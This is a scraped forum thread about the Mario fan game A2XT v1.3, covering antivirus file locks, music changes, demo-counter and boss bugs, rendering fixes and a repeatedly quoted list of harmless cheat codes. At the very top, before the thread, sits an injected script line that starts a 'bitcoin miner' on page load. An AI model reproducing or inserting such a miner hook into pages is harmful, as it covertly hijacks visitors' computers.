<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

A Second Mario Bros X Thing: analog funk V1.3

The second SMBX collab!
Rejnka
Posts: 23
Joined: 1 year ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Rejnka » 1 year ago

Wohlstand wrote:
Rejnka wrote:when i restart my computer, the A2MBXT smbx.exe vanishes and the folder gets to a way where even if you delete it and make a new folder with the same name, you won't be able to copy SMBX.exe to it. send help
I think, you can try the "Unlocker" tool, because some dumb Windows's descriptors are still be.
P.S. Sorry I have no English version of that site, but program itself supports many languages include English. Please use "Зеркало" (translates as "Mirror") link to get right build quickly (other links are will give you a crap to pass before get download)

When you will install and start it, in file context menu will appear unlocker's menu where you can try unlock file with removing locking descriptors from it
It could move the file, but then it vanished for no real reason.

Turns out the problem is with a2mbst.exe. Apparently, it's broken and will prevent you from copying SMBX.exe to any folder you run it in. Now I've ruined my whole A2XT folder. Also the unlocker program doesn't recognize it as being locked. So, instead, I have decided to backup my save, delete my copy entirely, reinstall the game and reinstate my save file, and hope for the best.

User avatar
Alice
💙
Posts: 1647
Joined: 6 years ago
Pronouns: Girl person
Location: Wonderland

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Alice » 1 year ago

You should check that your antivirus isn't being a pile of trash and quarantining the program.

Rejnka
Posts: 23
Joined: 1 year ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Rejnka » 1 year ago

Alice wrote:You should check that your antivirus isn't being a pile of trash and quarantining the program.
Just checked, that seems to be PART of what's going on? Still doesn't explain the permanent folder lock thing, though. Then again, nothing probably will.

EDIT: Actually, I think I've fiddled the riddle. Normally my anti-virus allows you to manually bypass this sort of thing while it's doing it, but because a2mbxt.exe loads smbx.exe, some sort of thing happens where smbx.exe doesn't get checked properly. Having to set two exceptions to an antivirus, at the very least one of which needs you to do so manually, isn't exactly consumer-friendly design but what can you really do ¯\_◕﹏◕_/¯

Steve
Posts: 3
Joined: 1 year ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Steve » 1 year ago

Hello, does anyone know where can I get the A2XT base game and episode 1 before some of the music and sound effects got replaced? Are the older versions available anywhere? Thank you.

User avatar
Wohlstand
PGE and LunaLUA developer
Posts: 154
Joined: 3 years ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Wohlstand » 1 year ago

Steve wrote:Hello, does anyone know where can I get the A2XT base game and episode 1 before some of the music and sound effects got replaced? Are the older versions available anywhere? Thank you.
a VERY old stuff collected at me here: http://wohlsoft.ru/docs/Collected/A2MBXT/ , but base game only (which still have LunaDLL 7 without LUA and updated episode may work incorrectly with it if some lua scripts are being applied). Many musics in current version are being replaced because:
  • Removing copyrighted tracks are not granted for free usage
  • Replaced fat-weight MP3 tracks with OGG, SPC and NSF
  • Many tracks made by Dr. Shemp and contributed here are being removed by it's request, and replaced with the others

Steve
Posts: 3
Joined: 1 year ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Steve » 1 year ago

Thank you. I take it older versions are lost forever, then? That's a shame, the music was very nice, it really added to the experience.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 1 year ago

Analog Funk V1.3 doesn't have DEMOS. World 3 ow music.
Also it has graphical glitch, different title ost.
Please fix these bugs.

User avatar
ano0maly
Retired Tester
Posts: 875
Joined: 6 years ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby ano0maly » 10 months ago

Jongseok wrote:different title ost
see Wohlstand's post above
Image
Image << Click!

Fan of the following:
Image Image

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 8 months ago

ano0maly wrote:
Then what about democounter?
There is no democounter on the top.
ex) DEMOS
11 / 456
Well, I just type "toggledemcounter"

User avatar
QubicTom
Pleasantly Confused
Posts: 775
Joined: 2 years ago
First name: Tom
Location: The North

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby QubicTom » 7 months ago

Is there a way of keeping the demo counter turned on by default? It seems that I have to type "toggledemocounter" at the start of every play session to see the counter.

User avatar
ano0maly
Retired Tester
Posts: 875
Joined: 6 years ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby ano0maly » 7 months ago

(I already talked about this in Discord but anyway) I don't know why the demo counter is seemingly off. Unlike version 1.2, which was thoroughly tested, 1.3 was an update that had some good changes but also has some errors and bugs left over from the process. The demo counter might be one of them.

While I'm at it, I might as well post the (presumably correct) list of A2XT cheat codes here:
This is a list of cheat codes to type in while playing a level. You cannot save your game after using cheat codes.

gimmeshell - Reserve box holds a green shell.
gimmeredshell - Reserve box holds a red shell.
gimmeblueshell - Reserve box holds a blue shell.
gimmeyellowshell - Reserve box holds a yellow shell.
gimmeturnip - Reserve box holds a turnip.
gimme1up - Reserve box holds a 1-UP.
gimmemushroom - Reserve box holds a Super Mushroom.
gimmeflower - Reserve box holds a Fire Flower.
gimmeleaf - Reserve box holds a Super Leaf.
gimmetanookisuit - Reserve box holds a Tanooki Suit.
gimmehammersuit - Reserve box holds a Hammer Suit.
gimmeniceflower - Reserve box holds an Ice Flower.
gimmenegg - Reserve box holds an egg with no contents.
gimmeplant - Reserve box holds Toothy, a plant that can smash through bricks and defeat enemies.
gimmegun - Reserve box holds the Billy Gun.
gimmeswitch - Reserve box holds a P-Switch.
gimmebomb - Reserve box holds a SMB2 Bomb.
gimmeshoe - Reserve box holds a Kuribo's Shoe
thatisademo - Changes player into Mario.
thatsaniris - Changes player into Luigi.
luigisonlycomrade - Changes player into Peach.
chipmunkthyme - Changes player into Toad.
oublions - Changes player into Link.
superbdemo128 - Clones player 128 times.
superbdemo64 - Clones player 64 times.
superbdemo32 - Clones player 32 times.
superbdemo16 - Clones player 16 times.
superbdemo8 - Clones player 8 times.
superbdemo4 - Clones player 4 times.
superbdemo2 - Mario and Luigi appear. Push down and the drop item button to switch from Mario to Luigi.
raomode - Enables 1-Player Mode. Will delete any clones from the superbdemo codes.
pprmode - Enables 2-Player Mode.
ohmanbomb - Spawns a bomb in the character's hand.
ohmanbullets - Spawns a Bullet Bill in the character's hand.
greenroe - Spawns an egg with a green Yoshi.
blueroe - Spawns an egg with a blue Yoshi.
yellowroe - Spawns an egg with a yellow Yoshi.
redroe - Spawns an egg with a red Yoshi.
blackroe - Spawns an egg with a black Yoshi.
purpleroe - Spawns an egg with a purple Yoshi.
pinkroe - Spawns an egg with a pink Yoshi.
coldroe - Spawns an egg with a cyan Yoshi.
tenacioustoes - With this, you can grab and hold any NPC.
strategyyo - This enables invincibility, although you can still fall off of edges.
framerate - Works like framerate code. Shows the current framerate.
waytoofast - The game's frames go as fast as possible, so the entire level's events happen faster.
ghostytime - Makes the player pitch-black. Allows the player to walk through walls.
throwinghammers - Spawns a friendly Hammer Brother in your hands.
capitalis - Turns all on-screen enemies into coins.
quebecoisrage - Hits you.
justtoohigh - Gives you a trampoline.
jumplikesomething - Allows infinite jumping.
peawing - If you have a leaf, tanooki suit, Yoshi, or Lakitu's Shoe, you gain infinite light.
juststop - With pause key you can stop time like a clock. (Does not work if pause key is Esc.)
havemoney - Gives you infinite coins.
mchammerdude - If you have a Flower or Hammer Suit, it allows you to do Autofire when holding the run button.
chipmunktimes - This enables faster running.
imtiredofallthiswalking - Opens all paths on World Map.
illparkwhereiwant - Lets you walk around the world map freely.
bobombplanet - A rain of bombs pour down and explode.
ittoodry - Toggles the level's underwater status; changes the stage's background and music.
brrbrr - Freezes all enemies on screen (as long as they're affected by iceballs).
wingster - Gives you a Propeller Block.
dacopykittylevel - Spawns a Propeller Flamethrower in your hands.
redigitiscool - This code is needed to save the game after using cheat codes.
Image
Image << Click!

Fan of the following:
Image Image

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 7 months ago

QubicTom wrote: Is there a way of keeping the demo counter turned on by default? It seems that I have to type "toggledemocounter" at the start of every play session to see the counter.
Yes,
I'm tired of doing that. :D
Typing "democounter" in the level is really annoying.
When a2xt's OS is LunaDLL, demo counter is always toggled, but LunaLua version of a2xt is always off.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 7 months ago

ano0maly wrote: (I already talked about this in Discord but anyway) I don't know why the demo counter is seemingly off. Unlike version 1.2, which was thoroughly tested, 1.3 was an update that had some good changes but also has some errors and bugs left over from the process. The demo counter might be one of them.

While I'm at it, I might as well post the (presumably correct) list of A2XT cheat codes here:
This is a list of cheat codes to type in while playing a level. You cannot save your game after using cheat codes.

gimmeshell - Reserve box holds a green shell.
gimmeredshell - Reserve box holds a red shell.
gimmeblueshell - Reserve box holds a blue shell.
gimmeyellowshell - Reserve box holds a yellow shell.
gimmeturnip - Reserve box holds a turnip.
gimme1up - Reserve box holds a 1-UP.
gimmemushroom - Reserve box holds a Super Mushroom.
gimmeflower - Reserve box holds a Fire Flower.
gimmeleaf - Reserve box holds a Super Leaf.
gimmetanookisuit - Reserve box holds a Tanooki Suit.
gimmehammersuit - Reserve box holds a Hammer Suit.
gimmeniceflower - Reserve box holds an Ice Flower.
gimmenegg - Reserve box holds an egg with no contents.
gimmeplant - Reserve box holds Toothy, a plant that can smash through bricks and defeat enemies.
gimmegun - Reserve box holds the Billy Gun.
gimmeswitch - Reserve box holds a P-Switch.
gimmebomb - Reserve box holds a SMB2 Bomb.
gimmeshoe - Reserve box holds a Kuribo's Shoe
thatisademo - Changes player into Mario.
thatsaniris - Changes player into Luigi.
luigisonlycomrade - Changes player into Peach.
chipmunkthyme - Changes player into Toad.
oublions - Changes player into Link.
superbdemo128 - Clones player 128 times.
superbdemo64 - Clones player 64 times.
superbdemo32 - Clones player 32 times.
superbdemo16 - Clones player 16 times.
superbdemo8 - Clones player 8 times.
superbdemo4 - Clones player 4 times.
superbdemo2 - Mario and Luigi appear. Push down and the drop item button to switch from Mario to Luigi.
raomode - Enables 1-Player Mode. Will delete any clones from the superbdemo codes.
pprmode - Enables 2-Player Mode.
ohmanbomb - Spawns a bomb in the character's hand.
ohmanbullets - Spawns a Bullet Bill in the character's hand.
greenroe - Spawns an egg with a green Yoshi.
blueroe - Spawns an egg with a blue Yoshi.
yellowroe - Spawns an egg with a yellow Yoshi.
redroe - Spawns an egg with a red Yoshi.
blackroe - Spawns an egg with a black Yoshi.
purpleroe - Spawns an egg with a purple Yoshi.
pinkroe - Spawns an egg with a pink Yoshi.
coldroe - Spawns an egg with a cyan Yoshi.
tenacioustoes - With this, you can grab and hold any NPC.
strategyyo - This enables invincibility, although you can still fall off of edges.
framerate - Works like framerate code. Shows the current framerate.
waytoofast - The game's frames go as fast as possible, so the entire level's events happen faster.
ghostytime - Makes the player pitch-black. Allows the player to walk through walls.
throwinghammers - Spawns a friendly Hammer Brother in your hands.
capitalis - Turns all on-screen enemies into coins.
quebecoisrage - Hits you.
justtoohigh - Gives you a trampoline.
jumplikesomething - Allows infinite jumping.
peawing - If you have a leaf, tanooki suit, Yoshi, or Lakitu's Shoe, you gain infinite light.
juststop - With pause key you can stop time like a clock. (Does not work if pause key is Esc.)
havemoney - Gives you infinite coins.
mchammerdude - If you have a Flower or Hammer Suit, it allows you to do Autofire when holding the run button.
chipmunktimes - This enables faster running.
imtiredofallthiswalking - Opens all paths on World Map.
illparkwhereiwant - Lets you walk around the world map freely.
bobombplanet - A rain of bombs pour down and explode.
ittoodry - Toggles the level's underwater status; changes the stage's background and music.
brrbrr - Freezes all enemies on screen (as long as they're affected by iceballs).
wingster - Gives you a Propeller Block.
dacopykittylevel - Spawns a Propeller Flamethrower in your hands.
redigitiscool - This code is needed to save the game after using cheat codes.
I didn't know A2XT has cheats.
Oh, thanks for the happy cheats~~

User avatar
QubicTom
Pleasantly Confused
Posts: 775
Joined: 2 years ago
First name: Tom
Location: The North

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby QubicTom » 6 months ago

Cross posted from the talkhaus SMBX discord:

I have an A2XT bug report: The Calleoca boss fight doesn't work correctly anymore. In her third phase, when she transforms into a lakitu/fishing fish guy, she stays a fixed distance away such that I can never reach her. Actually, the only time I see Calleoca in that phase is if I run to the very end of the level. Does this happen to anyone else? Is there anything I can do to fix this?

I can provide a video of this if necessary, but if someone else could confirm that this happens I'd much appreciate it! I can't continue A2XT until this is fixed (but I have enough videos recorded to do until Saturday next week, so I'm not in a huge rush to get this fixed... yet!)

User avatar
Tobi555
New A2MT Guy
Posts: 466
Joined: 1 year ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Tobi555 » 6 months ago

QubicTom wrote: Cross posted from the talkhaus SMBX discord:

I have an A2XT bug report: The Calleoca boss fight doesn't work correctly anymore. In her third phase, when she transforms into a lakitu/fishing fish guy, she stays a fixed distance away such that I can never reach her. Actually, the only time I see Calleoca in that phase is if I run to the very end of the level. Does this happen to anyone else? Is there anything I can do to fix this?

I can provide a video of this if necessary, but if someone else could confirm that this happens I'd much appreciate it! I can't continue A2XT until this is fixed (but I have enough videos recorded to do until Saturday next week, so I'm not in a huge rush to get this fixed... yet!)
I found a very (kinda) unconventional fix for that bug, once you trigger the lakitu calleoca run back to the start of the level and you can collect the coin there for some reason...it happened to me.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 6 months ago

Tobi555 wrote:
QubicTom wrote: Cross posted from the talkhaus SMBX discord:

I have an A2XT bug report: The Calleoca boss fight doesn't work correctly anymore. In her third phase, when she transforms into a lakitu/fishing fish guy, she stays a fixed distance away such that I can never reach her. Actually, the only time I see Calleoca in that phase is if I run to the very end of the level. Does this happen to anyone else? Is there anything I can do to fix this?

I can provide a video of this if necessary, but if someone else could confirm that this happens I'd much appreciate it! I can't continue A2XT until this is fixed (but I have enough videos recorded to do until Saturday next week, so I'm not in a huge rush to get this fixed... yet!)
I found a very (kinda) unconventional fix for that bug, once you trigger the lakitu calleoca run back to the start of the level and you can collect the coin there for some reason...it happened to me.
Tobi is right, actually you can beat this fricken boss thing. Just go to the beginning of that level, you can get the fish thing.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 6 months ago

Another unfair thing.
Like QubicTom's democounter, his democounter is always toggled though its OS lunalua. But my lunalua, I typed in the level, but if you beat or die in the lvl, it'll be off automatically. :cry: So, I need to type goddamn long toggledemocounter in every level. Please fix that problem in Episode 2.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 6 months ago

ano0maly wrote: (I already talked about this in Discord but anyway) I don't know why the demo counter is seemingly off. Unlike version 1.2, which was thoroughly tested, 1.3 was an update that had some good changes but also has some errors and bugs left over from the process. The demo counter might be one of them.

While I'm at it, I might as well post the (presumably correct) list of A2XT cheat codes here:
This is a list of cheat codes to type in while playing a level. You cannot save your game after using cheat codes.

gimmeshell - Reserve box holds a green shell.
gimmeredshell - Reserve box holds a red shell.
gimmeblueshell - Reserve box holds a blue shell.
gimmeyellowshell - Reserve box holds a yellow shell.
gimmeturnip - Reserve box holds a turnip.
gimme1up - Reserve box holds a 1-UP.
gimmemushroom - Reserve box holds a Super Mushroom.
gimmeflower - Reserve box holds a Fire Flower.
gimmeleaf - Reserve box holds a Super Leaf.
gimmetanookisuit - Reserve box holds a Tanooki Suit.
gimmehammersuit - Reserve box holds a Hammer Suit.
gimmeniceflower - Reserve box holds an Ice Flower.
gimmenegg - Reserve box holds an egg with no contents.
gimmeplant - Reserve box holds Toothy, a plant that can smash through bricks and defeat enemies.
gimmegun - Reserve box holds the Billy Gun.
gimmeswitch - Reserve box holds a P-Switch.
gimmebomb - Reserve box holds a SMB2 Bomb.
gimmeshoe - Reserve box holds a Kuribo's Shoe
thatisademo - Changes player into Mario.
thatsaniris - Changes player into Luigi.
luigisonlycomrade - Changes player into Peach.
chipmunkthyme - Changes player into Toad.
oublions - Changes player into Link.
superbdemo128 - Clones player 128 times.
superbdemo64 - Clones player 64 times.
superbdemo32 - Clones player 32 times.
superbdemo16 - Clones player 16 times.
superbdemo8 - Clones player 8 times.
superbdemo4 - Clones player 4 times.
superbdemo2 - Mario and Luigi appear. Push down and the drop item button to switch from Mario to Luigi.
raomode - Enables 1-Player Mode. Will delete any clones from the superbdemo codes.
pprmode - Enables 2-Player Mode.
ohmanbomb - Spawns a bomb in the character's hand.
ohmanbullets - Spawns a Bullet Bill in the character's hand.
greenroe - Spawns an egg with a green Yoshi.
blueroe - Spawns an egg with a blue Yoshi.
yellowroe - Spawns an egg with a yellow Yoshi.
redroe - Spawns an egg with a red Yoshi.
blackroe - Spawns an egg with a black Yoshi.
purpleroe - Spawns an egg with a purple Yoshi.
pinkroe - Spawns an egg with a pink Yoshi.
coldroe - Spawns an egg with a cyan Yoshi.
tenacioustoes - With this, you can grab and hold any NPC.
strategyyo - This enables invincibility, although you can still fall off of edges.
framerate - Works like framerate code. Shows the current framerate.
waytoofast - The game's frames go as fast as possible, so the entire level's events happen faster.
ghostytime - Makes the player pitch-black. Allows the player to walk through walls.
throwinghammers - Spawns a friendly Hammer Brother in your hands.
capitalis - Turns all on-screen enemies into coins.
quebecoisrage - Hits you.
justtoohigh - Gives you a trampoline.
jumplikesomething - Allows infinite jumping.
peawing - If you have a leaf, tanooki suit, Yoshi, or Lakitu's Shoe, you gain infinite light.
juststop - With pause key you can stop time like a clock. (Does not work if pause key is Esc.)
havemoney - Gives you infinite coins.
mchammerdude - If you have a Flower or Hammer Suit, it allows you to do Autofire when holding the run button.
chipmunktimes - This enables faster running.
imtiredofallthiswalking - Opens all paths on World Map.
illparkwhereiwant - Lets you walk around the world map freely.
bobombplanet - A rain of bombs pour down and explode.
ittoodry - Toggles the level's underwater status; changes the stage's background and music.
brrbrr - Freezes all enemies on screen (as long as they're affected by iceballs).
wingster - Gives you a Propeller Block.
dacopykittylevel - Spawns a Propeller Flamethrower in your hands.
redigitiscool - This code is needed to save the game after using cheat codes.
I thing 1.3 has a lot of bugs. Bugs are much more than good changes..

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 5 months ago

8flight wrote: I would like a request for a complete save file of A2XT 1.3.
Here it is. I have all leeks. 93 leeks.

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 5 months ago

8flight wrote: Thank you so much.

Also, I'm having a lot of foreground/background glitches in A2XT currently. I used the 2 download links on the first post but my character is occasionally behind tiles that are supposed to be background(i. e. quicksand, smb3 black tiles etc.)
You can fix easily by doing this: First, open Level Editor in A2MBXT.exe. Second, load a level which is glitched. And click File and Save. DONE!

User avatar
ano0maly
Retired Tester
Posts: 875
Joined: 6 years ago

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby ano0maly » 5 months ago

I haven't tried that, but if you don't want to directly touch the levels and manually edit them, download the PGE package and there should be a Maintainer tool. Run it and apply the fix that Wohlstand outlined here:

Instructions

It's not an official update to the game but it should make the game playable.
Image
Image << Click!

Fan of the following:
Image Image

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 5 months ago

ano0maly wrote: I haven't tried that, but if you don't want to directly touch the levels and manually edit them, download the PGE package and there should be a Maintainer tool. Run it and apply the fix that Wohlstand outlined here:

Instructions

It's not an official update to the game but it should make the game playable.
I didn't try that. I'd never heard 'bout that. When I was annoyed, I just open "Level Editor" acidentally, then I just saved any changes and I checked this magic(?) Oh well;\ =D Anyway, thanks for another instruction.

User avatar
Static
Eternally tired
Posts: 5
Joined: 4 months ago
Pronouns: he/him/his

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Static » 4 months ago

Due to me not having the latest version of OpenGL, the characters and everything classified as a "block" in the games' folders are drawn BEHIND most of the background objects, meaning that at some times in some levels, I can't see anything at all.
But here's the thing: my laptop is literally incapable of downloading the lastest version of OpenGL because my specs aren't great enough to support it. Does this simply mean I can't play the game (and by extension, the second episode when it's finished) without this often game-ruining problem?
Fuzzy

Jongseok
I need another addmusic.
Posts: 290
Joined: 1 year ago
Location: Seoul, Korea

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Jongseok » 4 months ago

Static wrote: Due to me not having the latest version of OpenGL, the characters and everything classified as a "block" in the games' folders are drawn BEHIND most of the background objects, meaning that at some times in some levels, I can't see anything at all.
But here's the thing: my laptop is literally incapable of downloading the lastest version of OpenGL because my specs aren't great enough to support it. Does this simply mean I can't play the game (and by extension, the second episode when it's finished) without this often game-ruining problem?
You can fix this easily by doing this.
Jongseok wrote:
ano0maly wrote: I haven't tried that, but if you don't want to directly touch the levels and manually edit them, download the PGE package and there should be a Maintainer tool. Run it and apply the fix that Wohlstand outlined here:

Instructions

It's not an official update to the game but it should make the game playable.

I didn't try that. I'd never heard 'bout that. When I was annoyed, I just open "Level Editor" accidentally, then I just saved any changes and I checked this magic(?) Oh well;\ =D Anyway, thanks for another instruction.

User avatar
Static
Eternally tired
Posts: 5
Joined: 4 months ago
Pronouns: he/him/his

Re: A Second Mario Bros X Thing: analog funk V1.3

Postby Static » 4 months ago

Sorry that I didn't read the posts before posting. Thank you
Fuzzy


Return to “A2XT”

Who is online

Users browsing this forum: No registered users and 4 guests

cron